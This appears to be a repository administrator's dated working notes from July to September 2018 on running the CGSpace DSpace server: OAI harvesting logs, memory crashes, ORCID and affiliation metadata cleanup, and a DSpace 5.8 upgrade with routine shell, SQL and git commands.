  • I was curious about how and when Altmetric harvests the OAI, so I looked in nginx’s OAI log
  • +
  • For every day in the past week I only see about 50 to 100 requests per day, but then about nine days ago I saw 1,500 requests
  • +
  • In there I see two bots making about 750 requests each, and this one is probably Altmetric:
  • +
+
178.33.237.157 - - [09/Jul/2018:17:00:46 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////100 HTTP/1.1" 200 58653 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
+178.33.237.157 - - [09/Jul/2018:17:01:11 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////200 HTTP/1.1" 200 67950 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
+...
+178.33.237.157 - - [09/Jul/2018:22:10:39 +0000] "GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////73900 HTTP/1.1" 200 25049 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_121)"
+
    +
  • So if they are getting 100 records per OAI request it would take them 739 requests
  • +
  • I wonder if I should add this user agent to the Tomcat Crawler Session Manager valve… does OAI use Tomcat sessions?
  • +
  • Appears not:
  • +
+
$ http --print Hh 'https://cgspace.cgiar.org/oai/request?verb=ListRecords&resumptionToken=oai_dc////100'
+GET /oai/request?verb=ListRecords&resumptionToken=oai_dc////100 HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: cgspace.cgiar.org
+User-Agent: HTTPie/0.9.9
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Type: application/xml;charset=UTF-8
+Date: Wed, 18 Jul 2018 14:46:37 GMT
+Server: nginx
+Strict-Transport-Security: max-age=15768000
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+

2018-07-19

+
    +
  • I tested a submission via SAF bundle to DSpace 5.8 and it worked fine
  • +
  • In addition to testing DSpace 5.8, I specifically wanted to see if the issue with specifying collections in metadata instead of on the command line would work (DS-3583)
  • +
  • Post a note on Yammer about Altmetric and Handle best practices
  • +
  • Update PostgreSQL JDBC jar from 42.2.2 to 42.2.4 in the RMG Ansible playbooks
  • +
  • IWMI asked why all the dates in their OpenSearch RSS feed show up as January 01, 2018
  • +
  • On closer inspection I notice that many of their items use “2018” as their dc.date.issued, which is a valid ISO 8601 date but it’s not very specific so DSpace assumes it is January 01, 2018 00:00:00…
  • +
  • I told her that they need to start using more accurate dates for their issue dates
  • +
  • In the example item I looked at the DOI has a publish date of 2018-03-16, so they should really try to capture that
  • +
+

2018-07-22

+
    +
  • I told the IWMI people that they can use sort_by=3 in their OpenSearch query to sort the results by dc.date.accessioned instead of dc.date.issued
  • +
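  • For example, an OpenSearch query sorted by accession date descending would look roughly like this (the query term and rpp value are just placeholders):
$ http 'https://cgspace.cgiar.org/open-search/discover?query=water&sort_by=3&order=DESC&rpp=100'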
  • They say that it is a burden for them to capture the issue dates, so I cautioned them that this is for their own benefit and future posterity, and that everyone else on CGSpace manages to capture the issue dates!
  • +
  • For future reference, as I had previously noted in 2018-04, sort options are configured in dspace.cfg, for example:
  • +
+
webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date
+
    +
  • Just because I was curious I made sure that these options are working as expected in DSpace 5.8 on DSpace Test (they are)
  • +
  • I tested the Atmire Listings and Reports (L&R) module one last time on my local test environment with a new snapshot of CGSpace’s database and re-generated Discovery index and it worked fine
  • +
  • I finally informed Atmire that we’re ready to proceed with deploying this to CGSpace, and asked them to advise whether we need to wait because of the SNAPSHOT versions in pom.xml
  • +
  • There is no word on the issue I reported with Tomcat 8.5.32 yet, though…
  • +
+

2018-07-23

+
    +
  • Still discussing dates with IWMI
  • +
  • I looked in the database to see the breakdown of date formats used in dc.date.issued, ie YYYY, YYYY-MM, or YYYY-MM-DD:
  • +
+
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}$';
+ count
+-------
+ 53292
+(1 row)
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}$';
+ count
+-------
+  3818
+(1 row)
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=15 and text_value ~ '^[0-9]{4}-[0-9]{2}-[0-9]{2}$';
+ count
+-------
+ 17357
+
    +
  • So it looks like YYYY is the most numerous, followed by YYYY-MM-DD, then YYYY-MM
  • +
+

2018-07-26

+
    +
  • Run system updates on DSpace Test (linode19) and reboot the server
  • +
+

2018-07-27

+
    +
  • Follow up with Atmire again about the SNAPSHOT versions in our pom.xml because I want to finalize the DSpace 5.8 upgrade soon and I haven’t heard from them in a month (ticket 560)
  • +

August, 2018

+ +
+

2018-08-01

+
    +
  • DSpace Test had crashed at some point yesterday morning and I see the following in dmesg:
  • +
+
[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+
    +
  • Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight
  • +
  • From the DSpace log I see that eventually Solr stopped responding, so I guess the java process that was OOM killed above was Tomcat’s
  • +
  • I’m not sure why Tomcat didn’t crash with an OutOfMemoryError…
  • +
  • Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core
  • +
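  • On this server the heap is set via JAVA_OPTS in Tomcat’s defaults file, so the change would be something like this (the file path and surrounding flags are from memory, not copied from the server):
# /etc/default/tomcat7
JAVA_OPTS="-Djava.awt.headless=true -Xms6144m -Xmx6144m -Dfile.encoding=UTF-8"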
  • The server only has 8GB of RAM so we’ll eventually need to upgrade to a larger one because we’ll start starving the OS, PostgreSQL, and command line batch processes
  • +
  • I ran all system updates on DSpace Test and rebooted it
  • +
+
    +
  • I started looking over the latest round of IITA batch records from Sisay on DSpace Test: IITA July_30 +
      +
    • incorrect authorship types
    • +
    • dozens of inconsistencies, spelling mistakes, and white space in author affiliations
    • +
    • minor issues in countries (California is not a country)
    • +
    • minor issues in IITA subjects, ISBNs, languages, and AGROVOC subjects
    • +
    +
  • +
+

2018-08-02

+
    +
  • DSpace Test crashed again, and the only error I see is this in dmesg:
  • +
+
[Thu Aug  2 00:00:12 2018] Out of memory: Kill process 1407 (java) score 787 or sacrifice child
+[Thu Aug  2 00:00:12 2018] Killed process 1407 (java) total-vm:18876328kB, anon-rss:6323836kB, file-rss:0kB, shmem-rss:0kB
+
    +
  • I am still assuming that this is the Tomcat process that is dying, so maybe actually we need to reduce its memory instead of increasing it?
  • +
  • The risk we run there is that we’ll start getting OutOfMemory errors from Tomcat
  • +
  • So basically we need a new test server with more RAM very soon…
  • +
  • Abenet asked about the workflow statistics in the Atmire CUA module again
  • +
  • Last year Atmire told me that it’s disabled by default but you can enable it with workflow.stats.enabled = true in the CUA configuration file
  • +
  • There was a bug with adding users so they sent a patch, but I didn’t merge it because it was very dirty and I wasn’t sure it actually fixed the problem
  • +
  • I just tried to enable the stats again on DSpace Test now that we’re on DSpace 5.8 with updated Atmire modules, but every user I search for shows “No data available”
  • +
  • As a test I submitted a new item and I was able to see it in the workflow statistics “data” tab, but not in the graph
  • +
+

2018-08-15

+
    +
  • Run through Peter’s list of author affiliations from earlier this month
  • +
  • I did some quick sanity checks and small cleanups in Open Refine, checking for spaces, weird accents, and encoding errors
  • +
  • Finally I did a test run with the fix-metadata-values.py script:
  • +
+
$ ./fix-metadata-values.py -i 2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
+$ ./delete-metadata-values.py -i 2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
+

2018-08-16

+
    +
  • Generate a list of the top 1,500 authors on CGSpace for Sisay so he can create the controlled vocabulary:
  • +
+
dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc limit 1500) to /tmp/2018-08-16-top-1500-authors.csv with csv; 
+
    +
  • Start working on adding the ORCID metadata to a handful of CIAT authors as requested by Elizabeth earlier this month
  • +
  • I might need to overhaul the add-orcid-identifiers-csv.py script to be a little more robust about author order and ORCID metadata that might have been altered manually by editors after submission, as this script was written without that consideration
  • +
  • After checking a few examples I see that checking only the text_value and place when adding ORCID fields is not enough anymore
  • +
  • It was a sane assumption when I was initially migrating ORCID records from Solr to regular metadata, but now it seems that some authors might have been added or changed after item submission
  • +
  • Now it is better to check if there is any existing ORCID identifier for a given author for the item…
  • +
  • I will have to update my script to extract the ORCID identifier and search for that
  • +
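  • A quick way to check whether an item already has any ORCID identifiers is to look at its cg.creator.id metadata directly, something like this (the resource_id is just a placeholder):
dspace=# select text_value, place from metadatavalue where resource_type_id=2 and resource_id=12345 and metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'creator' and qualifier = 'id');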
  • Re-create my local DSpace database using the latest PostgreSQL 9.6 Docker image and re-import the latest CGSpace dump:
  • +
+
$ sudo docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest ~/Downloads/cgspace_2018-08-16.backup
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+

2018-08-19

+
    +
  • Keep working on the CIAT ORCID identifiers from Elizabeth
  • +
  • In the spreadsheet she sent me there are some names with other versions in the database, so when it is obviously the same one (ie “Schultze-Kraft, Rainer” and “Schultze-Kraft, R.”) I will just tag them with ORCID identifiers too
  • +
  • This is less obvious and more error prone with names like “Peters” where there are many more authors
  • +
  • I see some errors in the variations of names as well, for example:
  • +
+
Verchot, Louis
+Verchot, L
+Verchot, L. V.
+Verchot, L.V
+Verchot, L.V.
+Verchot, LV
+Verchot, Louis V.
+
    +
  • I’ll just tag them all with Louis Verchot’s ORCID identifier…
  • +
  • In the end, I’ll run the following CSV with my add-orcid-identifiers-csv.py script:
  • +
+
dc.contributor.author,cg.creator.id
+"Campbell, Bruce",Bruce M Campbell: 0000-0002-0123-4859
+"Campbell, Bruce M.",Bruce M Campbell: 0000-0002-0123-4859
+"Campbell, B.M",Bruce M Campbell: 0000-0002-0123-4859
+"Peters, Michael",Michael Peters: 0000-0003-4237-3916
+"Peters, M.",Michael Peters: 0000-0003-4237-3916
+"Peters, M.K.",Michael Peters: 0000-0003-4237-3916
+"Tamene, Lulseged",Lulseged Tamene: 0000-0002-3806-8890
+"Desta, Lulseged Tamene",Lulseged Tamene: 0000-0002-3806-8890
+"Läderach, Peter",Peter Läderach: 0000-0001-8708-6318
+"Lundy, Mark",Mark Lundy: 0000-0002-5241-3777
+"Schultze-Kraft, Rainer",Rainer Schultze-Kraft: 0000-0002-4563-0044
+"Schultze-Kraft, R.",Rainer Schultze-Kraft: 0000-0002-4563-0044
+"Verchot, Louis",Louis Verchot: 0000-0001-8309-6754
+"Verchot, L",Louis Verchot: 0000-0001-8309-6754
+"Verchot, L. V.",Louis Verchot: 0000-0001-8309-6754
+"Verchot, L.V",Louis Verchot: 0000-0001-8309-6754
+"Verchot, L.V.",Louis Verchot: 0000-0001-8309-6754
+"Verchot, LV",Louis Verchot: 0000-0001-8309-6754
+"Verchot, Louis V.",Louis Verchot: 0000-0001-8309-6754
+"Mukankusi, Clare",Clare Mukankusi: 0000-0001-7837-4545
+"Mukankusi, Clare M.",Clare Mukankusi: 0000-0001-7837-4545
+"Wyckhuys, Kris",Kris Wyckhuys: 0000-0003-0922-488X
+"Wyckhuys, Kris A. G.",Kris Wyckhuys: 0000-0003-0922-488X
+"Wyckhuys, Kris A.G.",Kris Wyckhuys: 0000-0003-0922-488X
+"Chirinda, Ngonidzashe",Ngonidzashe Chirinda: 0000-0002-4213-6294
+"Chirinda, Ngoni",Ngonidzashe Chirinda: 0000-0002-4213-6294
+"Ngonidzashe, Chirinda",Ngonidzashe Chirinda: 0000-0002-4213-6294
+
    +
  • The invocation would be:
  • +
+
$ ./add-orcid-identifiers-csv.py -i 2018-08-16-ciat-orcid.csv -db dspace -u dspace -p 'fuuu'
+
    +
  • I ran the script on DSpace Test and CGSpace and tagged a total of 986 ORCID identifiers
  • +
  • Looking at the list of author affiliations from Peter one last time
  • +
  • I notice that I should add the Unicode character 0x00b4 (´) to my list of invalid characters to look for in Open Refine, so the latest version of the GREL expression becomes:
  • +
+
or(
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/)),
+  isNotNull(value.match(/.*\u2019.*/)),
+  isNotNull(value.match(/.*\u00b4.*/))
+)
+
    +
  • This character all by itself is indicative of encoding issues in French, Italian, and Spanish names, for example: De´veloppement and Investigacio´n
  • +
  • I will run the following on DSpace Test and CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2018-08-15-Correct-1083-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t correct -m 211
+$ ./delete-metadata-values.py -i /tmp/2018-08-15-Remove-11-Affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
+
    +
  • Then force an update of the Discovery index on DSpace Test:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    72m12.570s
+user    6m45.305s
+sys     2m2.461s
+
    +
  • And then on CGSpace:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    79m44.392s
+user    8m50.730s
+sys     2m20.248s
+
    +
  • Run system updates on DSpace Test and reboot the server
  • +
  • In unrelated news, I see some newish Russian bot making a few thousand requests per day and not re-using its XMLUI session:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep '19/Aug/2018' | grep -c 5.9.6.51
+1553
+# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-08-19
+1724
+
    +
  • I don’t even know how it’s possible for the bot to use MORE sessions than total requests…
  • +
  • The user agent is:
  • +
+
Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
+
    +
  • So I’m thinking we should add “crawl” to the Tomcat Crawler Session Manager valve, as we already have “bot” that catches Googlebot, Bingbot, etc.
  • +
+

2018-08-20

+
    +
  • Help Sisay with some UTF-8 encoding issues in a file Peter sent him
  • +
  • Finish up reconciling Atmire’s pull request for DSpace 5.8 changes with the latest status of our 5_x-prod branch
  • +
  • I had to do some git rev-list --reverse --no-merges oldestcommit..newestcommit and git cherry-pick -S hackery to get everything all in order
  • +
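  • Roughly, the cherry-picking looked like this (the branch names and range here are illustrative, not the exact refs I used):
$ git rev-list --reverse --no-merges 5_x-dspace-5.8..5_x-prod | xargs -n1 git cherry-pick -S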
  • After building I ran the Atmire schema migrations and forced old migrations, then did the ant update
  • +
  • I tried to build it on DSpace Test, but it seems to still need more RAM to complete (like I experienced last month), so I stopped Tomcat and set JAVA_OPTS to 1024m and tried the mvn package again
  • +
  • Still the mvn package takes forever and essentially hangs on processing the xmlui-mirage2 overlay (though after building all the themes)
  • +
  • I will try to reduce Tomcat memory from 4608m to 4096m and then retry the mvn package with 1024m of JAVA_OPTS again
  • +
  • After running the mvn package for the third time and waiting an hour, I attached strace to the Java process and saw that it was indeed reading XMLUI theme data… so I guess I just need to wait more
  • +
  • After waiting two hours the maven process completed and installation was successful
  • +
  • I restarted Tomcat and it seems everything is working well, so I’ll merge the pull request and try to schedule the CGSpace upgrade for this coming Sunday, August 26th
  • +
  • I merged Atmire’s pull request into our 5_x-dspace-5.8 temporary branch and then cherry-picked all the changes from 5_x-prod since April, 2018 when that temporary branch was created
  • +
  • As the branch histories are very different I cannot merge the new 5.8 branch into the current 5_x-prod branch
  • +
  • Instead, I will archive the current 5_x-prod DSpace 5.5 branch as 5_x-prod-dspace-5.5 and then hard reset 5_x-prod based on 5_x-dspace-5.8
  • +
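  • The git commands for that should be along these lines:
$ git branch 5_x-prod-dspace-5.5 5_x-prod    # archive the current DSpace 5.5 state
$ git checkout 5_x-prod
$ git reset --hard 5_x-dspace-5.8            # make 5_x-prod match the new 5.8 branch
$ git push origin 5_x-prod --force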
  • Unfortunately this will mess up the references in pull requests and issues on GitHub
  • +
+

2018-08-21

+
    +
  • Something must have happened, as the mvn package always takes about two hours now, stopping for a very long time near the end at this step:
  • +
+
[INFO] Processing overlay [ id org.dspace.modules:xmlui-mirage2]
+
    +
  • It’s the same on DSpace Test, my local laptop, and CGSpace…
  • +
  • It wasn’t this way before when I was constantly building the previous 5.8 branch with Atmire patches…
  • +
  • I will restore the previous 5_x-dspace-5.8 and atmire-module-upgrades-5.8 branches to see if the build time is different there
  • +
  • … it seems that the atmire-module-upgrades-5.8 branch still takes 1 hour and 23 minutes on my local machine…
  • +
  • Let me try to build the old 5_x-prod-dspace-5.5 branch on my local machine and see how long it takes
  • +
  • That one only took 13 minutes! So there is definitely something wrong with our 5.8 branch, now I should try vanilla DSpace 5.8
  • +
  • I notice that the step this pauses at is:
  • +
+
[INFO] --- maven-war-plugin:2.4:war (default-war) @ xmlui ---
+
    +
  • And I notice that Atmire changed something in the XMLUI module’s pom.xml as part of the DSpace 5.8 changes, specifically to remove the exclude for node_modules in the maven-war-plugin step
  • +
  • This exclude is present in vanilla DSpace, and if I add it back the build time goes from 1 hour 23 minutes to 12 minutes!
  • +
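  • From memory the exclude is in the XMLUI webapp’s pom.xml as a maven-war-plugin configuration, so adding it back would look something like this (the exact element and path are paraphrased, so treat it as a sketch rather than the literal vanilla DSpace snippet):
<plugin>
  <groupId>org.apache.maven.plugins</groupId>
  <artifactId>maven-war-plugin</artifactId>
  <configuration>
    <!-- skip copying the themes' node_modules into the WAR -->
    <warSourceExcludes>themes/*/node_modules/**</warSourceExcludes>
  </configuration>
</plugin>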
  • It makes sense that it would take longer to complete this step because the node_modules folder has tens of thousands of files, and we have 27 themes!
  • +
  • I need to test to see if this has any side effects when deployed…
  • +
  • In other news, I see there was a pull request in DSpace 5.9 that fixes the issue with not being able to have blank lines in CSVs when importing via command line or webui (DS-3245)
  • +
+

2018-08-23

+
    +
  • Skype meeting with CKM people to meet new web dev guy Tariku
  • +
  • They say they want to start working on the ContentDM harvester middleware again
  • +
  • I sent a list of the top 1500 author affiliations on CGSpace to CodeObia so we can compare ours with the ones on MELSpace
  • +
  • Discuss CTA items with Sisay, he was trying to figure out how to do the collection mapping in combination with SAFBuilder
  • +
  • It appears that the web UI’s upload interface requires you to specify the collection, whereas the CLI interface allows you to omit the collection command line flag and defer to the collections file inside each item in the bundle
  • +
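  • For reference, each item directory in a Simple Archive Format bundle can contain a collections file listing the Handles of the collections it should belong to, with the owning collection first (the handles below are placeholders):
$ cat item_0001/collections
10568/12345
10568/67890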
  • I imported the CTA items on CGSpace for Sisay:
  • +
+
$ dspace import -a -e s.webshet@cgiar.org -s /home/swebshet/ictupdates_uploads_August_21 -m /tmp/2018-08-23-cta-ictupdates.map
+

2018-08-26

+
    +
  • Doing the DSpace 5.8 upgrade on CGSpace (linode18)
  • +
  • I already finished the Maven build, now I’ll take a backup of the PostgreSQL database and do a database cleanup just in case:
  • +
+
$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-08-26-before-dspace-58.backup dspace
+$ dspace cleanup -v
+
    +
  • Now I can stop Tomcat and do the install:
  • +
+
$ cd dspace/target/dspace-installer
+$ ant update clean_backups update_geolite
+
    +
  • After the successful Ant update I can run the database migrations:
  • +
+
$ psql dspace dspace
+
+dspace=> \i /tmp/Atmire-DSpace-5.8-Schema-Migration.sql 
+DELETE 0
+UPDATE 1
+DELETE 1
+dspace=> \q
+
+$ dspace database migrate ignored
+
    +
  • Then I’ll run all system updates and reboot the server:
  • +
+
$ sudo su -
+# apt update && apt full-upgrade
+# apt clean && apt autoclean && apt autoremove
+# reboot
+
    +
  • After reboot I logged in and cleared all the XMLUI caches and everything looked to be working fine
  • +
  • Adam from WLE had asked a few weeks ago about getting the metadata for a bunch of items related to gender from 2013 until now
  • +
  • They want a CSV with all metadata, which the Atmire Listings and Reports module can’t do
  • +
  • I exported a list of items from Listings and Reports with the following criteria: from year 2013 until now, have WLE subject GENDER or GENDER POVERTY AND INSTITUTIONS, and CRP Water, Land and Ecosystems
  • +
  • Then I extracted the Handle links from the report so I could export each item’s metadata as CSV
  • +
+
$ grep -o -E "[0-9]{5}/[0-9]{0,5}" listings-export.txt > /tmp/iwmi-gender-items.txt
+
    +
  • Then on the DSpace server I exported the metadata for each item one by one:
  • +
+
$ while read -r line; do dspace metadata-export -f "/tmp/${line/\//-}.csv" -i $line; sleep 2; done < /tmp/iwmi-gender-items.txt
+
    +
  • But from here I realized that each of the fifty-nine items will have different columns in their CSVs, making it difficult to combine them
  • +
  • I’m not sure how to proceed without writing some script to parse and join the CSVs, and I don’t think it’s worth my time
  • +
  • I tested DSpace 5.8 in Tomcat 8.5.32 and it seems to work now, so I’m not sure why I got those errors last time I tried
  • +
  • It could have been a configuration issue, though, as I also reconciled the server.xml with the one in our Ansible infrastructure scripts
  • +
  • But now I can start testing and preparing to move DSpace Test to Ubuntu 18.04 + Tomcat 8.5 + OpenJDK + PostgreSQL 9.6…
  • +
  • Actually, upon closer inspection, it seems that when you try to go to Listings and Reports under Tomcat 8.5.33 you are taken to the JSPUI login page despite having already logged in in XMLUI
  • +
  • If I type my username and password again it does take me to Listings and Reports, though…
  • +
  • I don’t see anything interesting in the Catalina or DSpace logs, so I might have to file a bug with Atmire
  • +
  • For what it’s worth, the Content and Usage (CUA) module does load, though I can’t seem to get any results in the graph
  • +
  • I just checked to see if the Listings and Reports issue with using the CGSpace citation field was fixed as planned alongside the DSpace 5.8 upgrades (#589)
  • +
  • I was able to create a new layout containing only the citation field, so I closed the ticket
  • +
+

2018-08-29

+
    +
  • Discuss COPO with Martin Mueller
  • +
  • The idea he and the consortium have is to use this for metadata annotation (submission?) across all repositories
  • +
  • It is somehow related to adding events as items in the repository, and then linking related papers, presentations, etc to the event item using dc.relation, etc.
  • +
  • Discuss Linode server charges with Abenet, apparently we want to start charging these to Big Data
  • +
+

2018-08-30

+
    +
  • I fixed the graphical glitch in the cookieconsent popup (the dismiss bug is still there) by pinning the last known good version (3.0.6) in bower.json of each XMLUI theme
  • +
  • I guess cookieconsent got updated without me realizing it, and the previous expression ^3.0.6 made bower install version 3.1.0
  • +
September, 2018

+ +
+

2018-09-02

+
    +
  • New PostgreSQL JDBC driver version 42.2.5
  • +
  • I’ll update the DSpace role in our Ansible infrastructure playbooks and run the updated playbooks on CGSpace and DSpace Test
  • +
  • Also, I’ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system’s RAM, and we never re-ran them after migrating to larger Linodes last month
  • +
  • I’m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I’m getting those autowire errors in Tomcat 8.5.30 again:
  • +
+
02-Sep-2018 11:18:52.678 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
+ java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
+    at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
+    at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4776)
+    at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5240)
+    at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:150)
+    at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:754)
+    at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:730)
+    at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:734)
+    at org.apache.catalina.startup.HostConfig.deployDescriptor(HostConfig.java:629)
+    at org.apache.catalina.startup.HostConfig$DeployDescriptor.run(HostConfig.java:1838)
+    at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
+    at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+    at java.lang.Thread.run(Thread.java:748)
+Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
+
    +
  • Full log here: https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2
  • +
  • XMLUI fails to load, but the REST, SOLR, JSPUI, etc work
  • +
  • The old 5_x-prod-dspace-5.5 branch does work in Ubuntu 18.04 with Tomcat 8.5.30-1ubuntu1.4, however!
  • +
  • And the 5_x-prod DSpace 5.8 branch does work in Tomcat 8.5.x on my Arch Linux laptop…
  • +
  • I’m not sure where the issue is then!
  • +
+

2018-09-03

+
    +
  • Abenet says she’s getting three emails about periodic statistics reports every day since the DSpace 5.8 upgrade last week
  • +
  • They are from the CUA module
  • +
  • Two of them have “no data” and one has a “null” title
  • +
  • The last one is a report of the top downloaded items, and includes a graph
  • +
  • She will try to click the “Unsubscribe” link in the first two to see if it works, otherwise we should contact Atmire
  • +
  • The only one she remembers subscribing to is the top downloads one
  • +
+

2018-09-04

+
    +
  • I’m looking over the latest round of IITA records from Sisay: Mercy1806_August_29 +
      +
    • All fields are split with multiple columns like cg.authorship.types and cg.authorship.types[]
    • +
    • This makes it super annoying to do the checks and cleanup, so I will merge them (also time consuming)
    • +
    • Five items had dc.date.issued values like 2013-5 so I corrected them to be 2013-05
    • +
    • Several metadata fields had values with newlines in them (even in some titles!), which I fixed by trimming the consecutive whitespace in OpenRefine
    • +
    • Many (91!) items from before 2011 are indicated as having a CRP, but CRPs didn’t exist then so this is impossible +
        +
      • I got all items that were from 2011 and onwards using a custom facet with this GREL on the dc.date.issued column: isNotNull(value.match(/201[1-8].*/)) and then blanking their CRPs
      • +
      +
    • +
    • Some affiliations with only one separator (|) for multiple values
    • +
    • I replaced smart quotes like with plain ones
    • +
    • Some inconsistencies in cg.subject.iita like COWPEA and COWPEAS, and YAM and YAMS, etc, as well as some spelling mistakes like IMPACT ASSESSMENTN
    • +
    • Some values in the dc.identifier.isbn are actually ISSNs so I moved them to the dc.identifier.issn column
    • +
    • I found one invalid ISSN using a custom text facet with the regex from the ISSN page on Wikipedia: isNotBlank(value.match(/^\d{4}-\d{3}[\dxX]$/))
    • +
    • One invalid value for dc.type
    • +
    +
  • +
  • Abenet says she hasn’t received any more subscription emails from the CUA module since she unsubscribed yesterday, so I think we don’t need to create an issue on Atmire’s bug tracker anymore
